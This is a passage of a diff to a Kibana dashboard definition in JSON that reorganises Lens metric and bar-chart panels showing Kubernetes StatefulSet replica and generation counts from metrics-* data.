"kubernetes.state_statefulset" + } + } + } + ], + "internalReferences": [], + "query": { + "language": 
"kuery", + "query": "" + }, + "visualization": { + "breakdownByAccessor": "ccb9ef58-565b-4ffe-bb2e-60819199ccfc", + "collapseFn": "sum", + "layerId": "1e1f286b-da16-49ab-8ad6-cef60c577ce5", + "layerType": "data", + "metricAccessor": "615a6b08-bc26-4d84-8c18-7a9936cabbfb" + } }, - { - "embeddableConfig": { - "attributes": { - "description": "", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-37f25d48-9b81-419c-8a8b-e5daea0230d0", - "type": "index-pattern" + "title": "StatefulSet Replicas Observed [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 7, + "i": "d8265dae-829d-434f-a826-cc6062edfd3a", + "w": 9, + "x": 0, + "y": 4 + }, + "panelIndex": "d8265dae-829d-434f-a826-cc6062edfd3a", + "type": "lens", + "version": "8.10.2" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-37f25d48-9b81-419c-8a8b-e5daea0230d0", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "3fbf4162-1133-4eee-ad35-334b047efd3d", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "37f25d48-9b81-419c-8a8b-e5daea0230d0": { + "columnOrder": [ + "6ff73cdb-7c0e-4edc-8fd4-8ff784a137c1", + "7711a519-3a8d-4474-9efb-622dd7d57cdd" + ], + "columns": { + "6ff73cdb-7c0e-4edc-8fd4-8ff784a137c1": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10000 values of kubernetes.statefulset.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - { - "id": "metrics-*", - 
"name": "3fbf4162-1133-4eee-ad35-334b047efd3d", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "37f25d48-9b81-419c-8a8b-e5daea0230d0": { - "columnOrder": [ - "6ff73cdb-7c0e-4edc-8fd4-8ff784a137c1", - "7711a519-3a8d-4474-9efb-622dd7d57cdd" - ], - "columns": { - "6ff73cdb-7c0e-4edc-8fd4-8ff784a137c1": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10000 values of kubernetes.statefulset.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderAgg": { - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10000 - }, - "scale": "ordinal", - "sourceField": "kubernetes.statefulset.name" - }, - "7711a519-3a8d-4474-9efb-622dd7d57cdd": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "\"kubernetes.statefulset.replicas.desired\": *" - }, - "isBucketed": false, - "label": "Replicas Desired", - "operationType": "last_value", - "params": { - "showArrayValues": false, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.statefulset.replicas.desired" - } - }, - "ignoreGlobalFilters": false, - "incompleteColumns": {} - } - } - }, - "indexpattern": { - "layers": {} - }, - "textBased": { - "layers": {} - } + "orderBy": { + "type": "custom" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "data_stream.dataset", - "index": "3fbf4162-1133-4eee-ad35-334b047efd3d", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": 
"kubernetes.state_statefulset" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_statefulset" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "breakdownByAccessor": "6ff73cdb-7c0e-4edc-8fd4-8ff784a137c1", - "collapseFn": "sum", - "layerId": "37f25d48-9b81-419c-8a8b-e5daea0230d0", - "layerType": "data", - "metricAccessor": "7711a519-3a8d-4474-9efb-622dd7d57cdd" - } + "secondaryFields": [], + "size": 10000 + }, + "scale": "ordinal", + "sourceField": "kubernetes.statefulset.name" }, - "title": "StatefulSet Replicas Desired [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true + "7711a519-3a8d-4474-9efb-622dd7d57cdd": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"kubernetes.statefulset.replicas.desired\": *" + }, + "isBucketed": false, + "label": "Replicas Desired", + "operationType": "last_value", + "params": { + "showArrayValues": false, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.statefulset.replicas.desired" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {} + } + } }, - "gridData": { - "h": 7, - "i": "21039d12-cc17-4089-9d8f-3c62018c8f1c", - "w": 10, - "x": 9, - "y": 4 + "indexpattern": { + "layers": {} }, - "panelIndex": "21039d12-cc17-4089-9d8f-3c62018c8f1c", - "type": "lens", - "version": "8.10.2" + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "3fbf4162-1133-4eee-ad35-334b047efd3d", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_statefulset" + }, + "type": "phrase" + }, + 
"query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_statefulset" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "breakdownByAccessor": "6ff73cdb-7c0e-4edc-8fd4-8ff784a137c1", + "collapseFn": "sum", + "layerId": "37f25d48-9b81-419c-8a8b-e5daea0230d0", + "layerType": "data", + "metricAccessor": "7711a519-3a8d-4474-9efb-622dd7d57cdd" + } }, - { - "embeddableConfig": { - "attributes": { - "description": "", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-c5fc4b20-ec0c-46c3-aaf8-96970b768d34", - "type": "index-pattern" + "title": "StatefulSet Replicas Desired [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 7, + "i": "21039d12-cc17-4089-9d8f-3c62018c8f1c", + "w": 10, + "x": 9, + "y": 4 + }, + "panelIndex": "21039d12-cc17-4089-9d8f-3c62018c8f1c", + "type": "lens", + "version": "8.10.2" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-c5fc4b20-ec0c-46c3-aaf8-96970b768d34", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "778d517a-5fab-4174-8f76-966de3e4452a", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "c5fc4b20-ec0c-46c3-aaf8-96970b768d34": { + "columnOrder": [ + "b58f63d6-4d40-4b42-a746-9f5f96efdcae", + "d50dac83-e42b-4ef8-9048-d2c8a737334b" + ], + "columns": { + "b58f63d6-4d40-4b42-a746-9f5f96efdcae": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10000 values of kubernetes.statefulset.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + 
"label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - { - "id": "metrics-*", - "name": "778d517a-5fab-4174-8f76-966de3e4452a", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "c5fc4b20-ec0c-46c3-aaf8-96970b768d34": { - "columnOrder": [ - "b58f63d6-4d40-4b42-a746-9f5f96efdcae", - "d50dac83-e42b-4ef8-9048-d2c8a737334b" - ], - "columns": { - "b58f63d6-4d40-4b42-a746-9f5f96efdcae": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10000 values of kubernetes.statefulset.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderAgg": { - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10000 - }, - "scale": "ordinal", - "sourceField": "kubernetes.statefulset.name" - }, - "d50dac83-e42b-4ef8-9048-d2c8a737334b": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "\"kubernetes.statefulset.replicas.ready\": *" - }, - "isBucketed": false, - "label": "Replicas Ready ", - "operationType": "last_value", - "params": { - "showArrayValues": false, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.statefulset.replicas.ready" - } - }, - "ignoreGlobalFilters": false, - "incompleteColumns": {} - } - } - }, - "indexpattern": { - "layers": {} - }, - "textBased": { - "layers": {} - } + "orderBy": { + "type": "custom" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": 
"data_stream.dataset", - "index": "778d517a-5fab-4174-8f76-966de3e4452a", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.state_statefulset" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_statefulset" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "breakdownByAccessor": "b58f63d6-4d40-4b42-a746-9f5f96efdcae", - "collapseFn": "sum", - "layerId": "c5fc4b20-ec0c-46c3-aaf8-96970b768d34", - "layerType": "data", - "metricAccessor": "d50dac83-e42b-4ef8-9048-d2c8a737334b" - } + "secondaryFields": [], + "size": 10000 + }, + "scale": "ordinal", + "sourceField": "kubernetes.statefulset.name" }, - "title": "StatefulSet Replicas Ready [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true + "d50dac83-e42b-4ef8-9048-d2c8a737334b": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"kubernetes.statefulset.replicas.ready\": *" + }, + "isBucketed": false, + "label": "Replicas Ready ", + "operationType": "last_value", + "params": { + "showArrayValues": false, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.statefulset.replicas.ready" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {} + } + } }, - "gridData": { - "h": 7, - "i": "dd7df777-8dae-4374-96ee-461be82fbde4", - "w": 10, - "x": 19, - "y": 4 + "indexpattern": { + "layers": {} }, - "panelIndex": "dd7df777-8dae-4374-96ee-461be82fbde4", - "type": "lens", - "version": "8.10.2" + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "778d517a-5fab-4174-8f76-966de3e4452a", 
+ "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_statefulset" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_statefulset" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "breakdownByAccessor": "b58f63d6-4d40-4b42-a746-9f5f96efdcae", + "collapseFn": "sum", + "layerId": "c5fc4b20-ec0c-46c3-aaf8-96970b768d34", + "layerType": "data", + "metricAccessor": "d50dac83-e42b-4ef8-9048-d2c8a737334b" + } }, - { - "embeddableConfig": { - "attributes": { - "description": "", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-1b5bdc61-0d5f-42da-ab97-2fe6f73775d5", - "type": "index-pattern" + "title": "StatefulSet Replicas Ready [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 7, + "i": "dd7df777-8dae-4374-96ee-461be82fbde4", + "w": 10, + "x": 19, + "y": 4 + }, + "panelIndex": "dd7df777-8dae-4374-96ee-461be82fbde4", + "type": "lens", + "version": "8.10.2" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-1b5bdc61-0d5f-42da-ab97-2fe6f73775d5", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "0ae72fd9-5dfe-480d-9fbc-ca97c60c1955", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "1b5bdc61-0d5f-42da-ab97-2fe6f73775d5": { + "columnOrder": [ + "66f7c724-56a4-45d4-b5fa-029ce4d4468b", + "a6a97e4d-1e79-4822-a8ea-84d06e89038b" + ], + "columns": { + "66f7c724-56a4-45d4-b5fa-029ce4d4468b": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10000 values of kubernetes.statefulset.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": 
false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - { - "id": "metrics-*", - "name": "0ae72fd9-5dfe-480d-9fbc-ca97c60c1955", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "1b5bdc61-0d5f-42da-ab97-2fe6f73775d5": { - "columnOrder": [ - "66f7c724-56a4-45d4-b5fa-029ce4d4468b", - "a6a97e4d-1e79-4822-a8ea-84d06e89038b" - ], - "columns": { - "66f7c724-56a4-45d4-b5fa-029ce4d4468b": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10000 values of kubernetes.statefulset.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderAgg": { - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10000 - }, - "scale": "ordinal", - "sourceField": "kubernetes.statefulset.name" - }, - "a6a97e4d-1e79-4822-a8ea-84d06e89038b": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "\"kubernetes.statefulset.generation.observed\": *" - }, - "isBucketed": false, - "label": "Generation Observed", - "operationType": "last_value", - "params": { - "showArrayValues": false, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.statefulset.generation.observed" - } - }, - "ignoreGlobalFilters": false, - "incompleteColumns": {} - } - } - }, - "indexpattern": { - "layers": {} - }, - "textBased": { - "layers": {} - } + 
"orderBy": { + "type": "custom" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "data_stream.dataset", - "index": "0ae72fd9-5dfe-480d-9fbc-ca97c60c1955", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.state_statefulset" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_statefulset" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "breakdownByAccessor": "66f7c724-56a4-45d4-b5fa-029ce4d4468b", - "collapseFn": "sum", - "layerId": "1b5bdc61-0d5f-42da-ab97-2fe6f73775d5", - "layerType": "data", - "metricAccessor": "a6a97e4d-1e79-4822-a8ea-84d06e89038b" - } + "secondaryFields": [], + "size": 10000 + }, + "scale": "ordinal", + "sourceField": "kubernetes.statefulset.name" }, - "title": "StatefulSet Generation Observed [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true + "a6a97e4d-1e79-4822-a8ea-84d06e89038b": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"kubernetes.statefulset.generation.observed\": *" + }, + "isBucketed": false, + "label": "Generation Observed", + "operationType": "last_value", + "params": { + "showArrayValues": false, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.statefulset.generation.observed" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {} + } + } }, - "gridData": { - "h": 7, - "i": "3e6790d6-de88-47de-8c3e-d8aa2c89c538", - "w": 10, - "x": 29, - "y": 4 + "indexpattern": { + "layers": {} }, - "panelIndex": "3e6790d6-de88-47de-8c3e-d8aa2c89c538", - "type": "lens", - "version": "8.10.2" + "textBased": { + "layers": {} + } + }, + "filters": [ + { 
+ "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "0ae72fd9-5dfe-480d-9fbc-ca97c60c1955", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_statefulset" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_statefulset" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "breakdownByAccessor": "66f7c724-56a4-45d4-b5fa-029ce4d4468b", + "collapseFn": "sum", + "layerId": "1b5bdc61-0d5f-42da-ab97-2fe6f73775d5", + "layerType": "data", + "metricAccessor": "a6a97e4d-1e79-4822-a8ea-84d06e89038b" + } }, - { - "embeddableConfig": { - "attributes": { - "description": "", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-7f72a30a-3591-492d-83d7-2fd9d40e5ef6", - "type": "index-pattern" + "title": "StatefulSet Generation Observed [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 7, + "i": "3e6790d6-de88-47de-8c3e-d8aa2c89c538", + "w": 10, + "x": 29, + "y": 4 + }, + "panelIndex": "3e6790d6-de88-47de-8c3e-d8aa2c89c538", + "type": "lens", + "version": "8.10.2" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-7f72a30a-3591-492d-83d7-2fd9d40e5ef6", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "84dd109c-0824-4ccf-948b-8bad46f6203a", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "7f72a30a-3591-492d-83d7-2fd9d40e5ef6": { + "columnOrder": [ + "ee9e9b2d-2218-4267-9cd8-7ebed0ac6f87", + "c0c872cb-98c7-4070-861e-56fa930708a1" + ], + "columns": { + "c0c872cb-98c7-4070-861e-56fa930708a1": { + 
"customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"kubernetes.statefulset.generation.desired\": *" + }, + "isBucketed": false, + "label": "Generation Desired ", + "operationType": "last_value", + "params": { + "showArrayValues": false, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.statefulset.generation.desired" + }, + "ee9e9b2d-2218-4267-9cd8-7ebed0ac6f87": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10000 values of kubernetes.statefulset.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - { - "id": "metrics-*", - "name": "84dd109c-0824-4ccf-948b-8bad46f6203a", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "7f72a30a-3591-492d-83d7-2fd9d40e5ef6": { - "columnOrder": [ - "ee9e9b2d-2218-4267-9cd8-7ebed0ac6f87", - "c0c872cb-98c7-4070-861e-56fa930708a1" - ], - "columns": { - "c0c872cb-98c7-4070-861e-56fa930708a1": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "\"kubernetes.statefulset.generation.desired\": *" - }, - "isBucketed": false, - "label": "Generation Desired ", - "operationType": "last_value", - "params": { - "showArrayValues": false, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.statefulset.generation.desired" - }, - "ee9e9b2d-2218-4267-9cd8-7ebed0ac6f87": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10000 values of kubernetes.statefulset.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - 
"missingBucket": false, - "orderAgg": { - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10000 - }, - "scale": "ordinal", - "sourceField": "kubernetes.statefulset.name" - } - }, - "ignoreGlobalFilters": false, - "incompleteColumns": {} - } - } - }, - "indexpattern": { - "layers": {} - }, - "textBased": { - "layers": {} - } + "orderBy": { + "type": "custom" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "data_stream.dataset", - "index": "84dd109c-0824-4ccf-948b-8bad46f6203a", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.state_statefulset" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_statefulset" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "breakdownByAccessor": "ee9e9b2d-2218-4267-9cd8-7ebed0ac6f87", - "collapseFn": "sum", - "layerId": "7f72a30a-3591-492d-83d7-2fd9d40e5ef6", - "layerType": "data", - "metricAccessor": "c0c872cb-98c7-4070-861e-56fa930708a1" - } - }, - "title": "StatefulSet Generation Desired [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true + "secondaryFields": [], + "size": 10000 + }, + "scale": "ordinal", + "sourceField": "kubernetes.statefulset.name" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {} + } + } }, - "gridData": { - "h": 7, - "i": "34f2d226-f9e4-47f7-87d6-e3f5fb1db6d3", - "w": 9, - "x": 39, - "y": 4 + 
"indexpattern": { + "layers": {} }, - "panelIndex": "34f2d226-f9e4-47f7-87d6-e3f5fb1db6d3", - "type": "lens", - "version": "8.10.2" + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "84dd109c-0824-4ccf-948b-8bad46f6203a", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_statefulset" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_statefulset" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "breakdownByAccessor": "ee9e9b2d-2218-4267-9cd8-7ebed0ac6f87", + "collapseFn": "sum", + "layerId": "7f72a30a-3591-492d-83d7-2fd9d40e5ef6", + "layerType": "data", + "metricAccessor": "c0c872cb-98c7-4070-861e-56fa930708a1" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-0b03a29a-8bd6-485d-b34c-5682853a3ec6", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "33ac762e-904d-4a44-a943-e76d147b5770", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "0b03a29a-8bd6-485d-b34c-5682853a3ec6": { - "columnOrder": [ - "c7aa47ec-c87d-47ac-a318-a00b90b32b5d", - "0c8870bf-3e60-4949-9715-6b7a762034b4", - "6d1c5b5e-1686-44e9-8d96-cf72f5c3b519" - ], - "columns": { - "0c8870bf-3e60-4949-9715-6b7a762034b4": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.statefulset.replicas.desired: *" - }, - "isBucketed": false, - "label": "Replicas Desired", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.statefulset.replicas.desired" - }, - 
"6d1c5b5e-1686-44e9-8d96-cf72f5c3b519": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.statefulset.replicas.ready: *" - }, - "isBucketed": false, - "label": "Replicas ready", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.statefulset.replicas.ready" - }, - "c7aa47ec-c87d-47ac-a318-a00b90b32b5d": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "StatefulSet Name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "0c8870bf-3e60-4949-9715-6b7a762034b4", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 20 - }, - "scale": "ordinal", - "sourceField": "kubernetes.statefulset.name" - } - }, - "incompleteColumns": {} - } - } - } + "title": "StatefulSet Generation Desired [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 7, + "i": "34f2d226-f9e4-47f7-87d6-e3f5fb1db6d3", + "w": 9, + "x": 39, + "y": 4 + }, + "panelIndex": "34f2d226-f9e4-47f7-87d6-e3f5fb1db6d3", + "type": "lens", + "version": "8.10.2" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-0b03a29a-8bd6-485d-b34c-5682853a3ec6", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "33ac762e-904d-4a44-a943-e76d147b5770", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "0b03a29a-8bd6-485d-b34c-5682853a3ec6": { + "columnOrder": [ + "c7aa47ec-c87d-47ac-a318-a00b90b32b5d", + "0c8870bf-3e60-4949-9715-6b7a762034b4", + "6d1c5b5e-1686-44e9-8d96-cf72f5c3b519" + ], + "columns": { + "0c8870bf-3e60-4949-9715-6b7a762034b4": { + "customLabel": true, + 
"dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.statefulset.replicas.desired: *" + }, + "isBucketed": false, + "label": "Replicas Desired", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.statefulset.replicas.desired" + }, + "6d1c5b5e-1686-44e9-8d96-cf72f5c3b519": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.statefulset.replicas.ready: *" + }, + "isBucketed": false, + "label": "Replicas ready", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.statefulset.replicas.ready" + }, + "c7aa47ec-c87d-47ac-a318-a00b90b32b5d": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "StatefulSet Name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "0c8870bf-3e60-4949-9715-6b7a762034b4", + "type": "column" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "33ac762e-904d-4a44-a943-e76d147b5770", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.state_statefulset" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_statefulset" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "layers": [ - { - "accessors": [ - "0c8870bf-3e60-4949-9715-6b7a762034b4", - "6d1c5b5e-1686-44e9-8d96-cf72f5c3b519" - ], - "layerId": "0b03a29a-8bd6-485d-b34c-5682853a3ec6", - "layerType": "data", - "position": "top", - "seriesType": "bar_stacked", - "showGridlines": false, - "xAccessor": "c7aa47ec-c87d-47ac-a318-a00b90b32b5d" - } - ], - "legend": { - 
